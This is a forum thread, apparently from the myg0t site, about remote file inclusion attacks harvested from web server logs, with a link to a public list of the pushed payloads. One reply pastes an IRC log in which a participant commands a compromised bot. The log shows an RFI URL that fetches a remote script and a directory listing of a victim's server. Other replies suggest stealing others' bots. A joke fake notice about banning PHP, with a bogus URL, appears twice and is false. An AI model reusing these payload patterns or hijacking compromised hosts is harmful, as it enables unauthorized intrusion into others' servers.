Jump to content

Featured Replies

Posted

Seeing all these RFI (Remote File Include) attempts to the web server ever increasing daily, it dawned on me yesterday that I should pull them all out of the logs and generate a list that includes the file they are trying to push to the server. So I made a script that goes through and does just that. Figured I would make them public for others to enjoy. Some will 404, as they use free sites to host them and they get deleted by the host, others include some fun information for fucking with other peoples bots and such.

 

http://www.myg0t.com/omp/rfiscanlist.htm

 

If you do not know what RFI scans are then this does not apply to you. If you would like to educate yourself on this, you can read about them here: http://en.wikipedia.org/wiki/Remote_File_Inclusion

Daily business on the myg0t.com site, are you going to forward these log files to the FBI since we have a similiar device operating on the site now?
  • Author
DerKaiser;545489']Daily business on the myg0t.com site' date=' are you going to forward these log files to the FBI since we have a similiar device operating on the site now?[/quote']

 

Huh?

 

Lost in translation I guess.

a couple of you had pm'd me asking why its down today so this is for anyone else wondering; the data center has to replace a power line and install some type of FBI network monitoring devices per some law.

 

To clarify ;x

OverlordQ;545498']Agaghahghagh' date=' I make somebodys bots .quit[/quote']

 

It's better to try and steal them & use them for your own shit.

are there any sites specifically for learning about this kind of shit?

 

i'm intrigued.

 

Learn to code.

 

nice link hopefully those who follow it will be enlightened.

 

i notice that nobody's been able to spam the forums yet, though. Or gain access to administrator accounts. I haven't really seen some of these PHP shells before; this is quite interesting.

 

Because myg0t's not vulnerable to RFI's?

 

 

 

It's interesting to see brazilians and shit's different styles tho.

"server"=>"katana.webchat.org",

"port"=>6667,

"chan"=>"#samera",

 

lol

 

ATTACK!

 

but he set +m on channel

18:37… teviawn: .info

18:37… L02380609: [info]: [httpd: Apache] [docroot: c:/apache/htdocs] [domain: localhost] [admin: [email protected]] [url:/index.php?seccion=http://bialoka123.fileave.com/script9.txt??]

 

19:01… teviawn: .exec dir

19:01… L02380609: [exec]: dir

19:01… L02380609: : Volume in drive C has no label.

19:01… L02380609: : Volume Serial Number is 54BD-1345

19:01… L02380609: : Directory of c:\apache\htdocs

19:01… L02380609: : 18/02/2008 12:58a <DIR> .

19:01… L02380609: : 18/02/2008 12:58a <DIR> ..

19:01… L02380609: : 20/06/2003 02:25p 2 #i#

19:01… L02380609: : 02/07/2003 03:57p 294 #testcom.php#

19:01… L02380609: : 15/11/2007 09:27p 0 11.txt

19:01… L02380609: : 14/02/2008 08:34p 0 6

19:01… L02380609: : 07/04/2005 10:30a 12,543 activity.php

19:02… L02380609: : 31/07/2007 07:54a 9,272 activitypmp.php

19:02… L02380609: : 27/02/2006 07:35p 3,225 activitypmpn.php

19:02… L02380609: : 24/02/2006 09:40p 7,859 activitypmp_old.php

19:02… L02380609: : 27/04/2007 05:44p 7,925 activitypmp_old0.php

19:02… L02380609: : 24/02/2006 09:40p 7,903 activitypmp_ori.php

19:02… L02380609: : 30/01/2008 10:01p 5,324 advantages.htm

19:02… L02380609: : 24/11/2007 02:11p 41 alan.txt

19:02… L02380609: : 30/01/2008 10:00p 1,637 alliances.htm

19:02… L02380609: : 30/01/2008 10:00p 2,200 alliances_2.htm

19:02… L02380609: : 06/01/2005 03:11a 2,326 apache_pb.gif

19:02… L02380609 has quit IRC (Excess flood)

 

Shittily coded, lol.

Due to numerous complaints on the subject, the Internets Administrative Networking Association has decided to severly limit the use of PHP files. From now on, PHP files will only be usable over Corporate and Private LAN Configurations and NOT on Public Internets or Intranets. PHP files may be converted to .jpg with Data Mapping for certain interactive Features or the popular XML format at http://iana.cnn.com/convertphp.xml for free of charge.
Due to numerous complaints on the subject, the Internets Administrative Networking Association has decided to severly limit the use of PHP files. From now on, PHP files will only be usable over Corporate and Private LAN Configurations and NOT on Public Internets or Intranets. PHP files may be converted to .jpg with Data Mapping for certain interactive Features or the popular XML format at http://iana.cnn.com/convertphp.xml for free of charge.

 

aghaghaghaghagha the internets administrative networking association

Guest
This topic is now closed to further replies.